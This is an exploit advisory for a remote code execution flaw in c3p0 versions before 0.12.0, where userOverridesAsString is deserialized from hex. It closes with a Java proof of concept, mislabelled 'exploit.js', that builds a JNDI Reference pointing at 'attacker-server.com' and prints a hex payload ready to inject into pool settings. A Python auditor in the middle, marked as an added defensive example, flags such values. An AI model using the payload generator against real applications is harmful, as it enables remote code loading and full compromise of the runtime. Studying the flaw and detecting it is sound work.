=============================================================================================================================================
| # Title : c3p0 prior to version 0.12.0 via userOverridesAsString Insecure Deserialization and Remote JNDI Class Loading |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.mchange.com/projects/c3p0/ |
=============================================================================================================================================

[+] Summary :

A critical vulnerability in c3p0 prior to version 0.12.0 allows attackers to achieve remote code execution (RCE) through insecure handling of the userOverridesAsString property in several ConnectionPoolDataSource implementations.

Before version 0.12.0, this property was internally stored as a hex-encoded Java-serialized object. If an attacker is able to modify or inject a malicious value into this property — either directly, via crafted serialized objects, or through malicious javax.naming.Reference instances — the application may deserialize untrusted data.

The risk is significantly amplified by legacy behavior in mchange-commons-java, a core dependency of c3p0. Older versions allowed ungated support for remote factoryClassLocation values, enabling remote class loading through embedded JNDI references.

[+] During deserialization :

    1. The hex-encoded string is decoded into a byte array
    2. The object is deserialized
    3. Embedded javax.naming.Reference objects may be dereferenced
    4. Remote classes may be downloaded from attacker-controlled locations
    5. Arbitrary code may execute within the application's CLASSPATH

This creates a full Remote Code Execution condition if the attacker can influence configuration properties or serialized inputs.
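[+] Defensive check (added example) :

The following Python script is an added defensive example, not code from this advisory or from the c3p0 project. It audits a c3p0 properties file for a userOverridesAsString value that hex-decodes to a Java serialization stream (magic ACED, version 5) and lists the class names found in TC_CLASSDESC records, flagging javax.naming.Reference (named in the advisory) and javax.naming.StringRefAddr (the address type a Reference carries). The "key=value" properties layout, the heuristic class-name scan and the sample streams are assumptions constructed for the example; the scan is not a full Java serialization grammar parser.

```python
"""Audit c3p0 properties for a hex-encoded Java-serialized userOverridesAsString.

Added defensive example, not advisory or c3p0 project code. Assumptions:
Java properties-style "key=value" input, and a heuristic TC_CLASSDESC scan
rather than a full java.io.ObjectInputStream grammar parser.
"""
import binascii
import re
import struct

STREAM_MAGIC = b"\xac\xed"   # java.io.ObjectStreamConstants.STREAM_MAGIC
STREAM_VERSION = 5           # java.io.ObjectStreamConstants.STREAM_VERSION
TC_OBJECT = 0x73
TC_CLASSDESC = 0x72
# Class names whose presence in a pool-configuration value a defender wants
# surfaced: the JNDI Reference named in the advisory and its address type.
SUSPICIOUS_CLASSES = ("javax.naming.Reference", "javax.naming.StringRefAddr")


def decode_hex_value(value):
    """Hex-decode the property value as c3p0 < 0.12.0 did; None if it is not hex."""
    cleaned = value.strip()
    if not cleaned or len(cleaned) % 2 or not re.fullmatch(r"[0-9A-Fa-f]+", cleaned):
        return None
    return binascii.unhexlify(cleaned)


def is_java_serialized(data):
    """True when the bytes start with the Java serialization magic and version."""
    return (len(data) >= 4 and data[:2] == STREAM_MAGIC
            and struct.unpack(">H", data[2:4])[0] == STREAM_VERSION)


def class_names_in_stream(data):
    """Heuristic: collect the class name following each TC_CLASSDESC tag.

    A class descriptor is the tag byte, a 2-byte big-endian length and the
    UTF-8 class name. Candidates that do not look like a Java class name are
    discarded so stray 0x72 data bytes do not produce false entries.
    """
    names = []
    i = 4  # skip magic and version
    while i < len(data) - 3:
        if data[i] == TC_CLASSDESC:
            length = struct.unpack(">H", data[i + 1:i + 3])[0]
            raw = data[i + 3:i + 3 + length]
            if len(raw) == length:
                try:
                    name = raw.decode("utf-8")
                except UnicodeDecodeError:
                    name = None
                if name and re.fullmatch(r"[A-Za-z_$][\w$.]*", name):
                    names.append(name)
                    i += 3 + length
                    continue
        i += 1
    return names


def audit_c3p0_properties(text):
    """Return one finding per userOverridesAsString entry in a properties text."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, sep, value = line.partition("=")
        key = key.strip()
        if not sep or not key.endswith("userOverridesAsString"):
            continue
        data = decode_hex_value(value)
        serialized = data is not None and is_java_serialized(data)
        classes = class_names_in_stream(data) if serialized else []
        findings.append({
            "key": key,
            "serialized": serialized,
            "classes": classes,
            "suspicious": [c for c in classes if c in SUSPICIOUS_CLASSES],
        })
    return findings


def _synthetic_stream(class_name):
    """Constructed sample: magic, version, TC_OBJECT, TC_CLASSDESC and a class
    name. Enough for the scanner; not a complete, valid Java object stream."""
    name = class_name.encode("utf-8")
    return (STREAM_MAGIC + struct.pack(">H", STREAM_VERSION) + bytes([TC_OBJECT])
            + bytes([TC_CLASSDESC]) + struct.pack(">H", len(name)) + name)


# Constructed sample properties: a legitimate-looking map of user overrides,
# and one whose serialized value carries a JNDI Reference.
BENIGN_SAMPLE = ("# constructed sample c3p0.properties\n"
                 "c3p0.maxPoolSize=20\n"
                 "c3p0.userOverridesAsString="
                 + _synthetic_stream("java.util.HashMap").hex().upper() + "\n")
FLAGGED_SAMPLE = ("c3p0.userOverridesAsString="
                  + _synthetic_stream("javax.naming.Reference").hex().upper() + "\n")

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_SAMPLE), ("flagged", FLAGGED_SAMPLE)):
        for finding in audit_c3p0_properties(sample):
            print(label, finding)
```

A legitimate pre-0.12.0 value decodes to a serialized map of per-user overrides, so the scan reports every class name and only flags the JNDI-related ones; any configuration where the decoded stream contains javax.naming.Reference warrants review of who can write pool configuration, and upgrading to c3p0 0.12.0 removes the hex-serialized storage the advisory describes.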
[+] Impact :

    Remote Code Execution (RCE)
    Arbitrary class loading from remote servers
    Full compromise of application runtime
    Potential lateral movement within enterprise environments

[+] POC : exploit.js

    import java.io.*;
    import javax.naming.Reference;

    public class C3P0ExploitPayload {

        public static void main(String[] args) {
            try {
                // 1. Setup malicious server details
                String attackerUrl = "http://attacker-server.com/";
                String className = "ExploitObject";

                Reference ref = new Reference(className, className, attackerUrl);

                byte[] serializedObject = serialize(ref);
                String hexPayload = bytesToHex(serializedObject);

                System.out.println("--- Payload Ready for Injection ---");
                System.out.println("Property: c3p0.userOverridesAsString");
                System.out.println("Value: " + hexPayload);
                System.out.println("\n--- Note ---");
                System.out.println("When this value is placed in c3p0 settings, the application will decode the Hex");
                System.out.println("and deserialize the object, triggering a JNDI Remote Class Loading attack.");
            } catch (Exception e) {
                e.printStackTrace();
            }
        }

        // Java-serialize an object into a byte array
        private static byte[] serialize(Object obj) throws IOException {
            ByteArrayOutputStream baos = new ByteArrayOutputStream();
            ObjectOutputStream oos = new ObjectOutputStream(baos);
            oos.writeObject(obj);
            oos.close();
            return baos.toByteArray();
        }

        // Hex-encode the bytes in the upper-case form c3p0 stored
        private static String bytesToHex(byte[] bytes) {
            StringBuilder sb = new StringBuilder();
            for (byte b : bytes) {
                sb.append(String.format("%02x", b));
            }
            return sb.toString().toUpperCase();
        }
    }

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================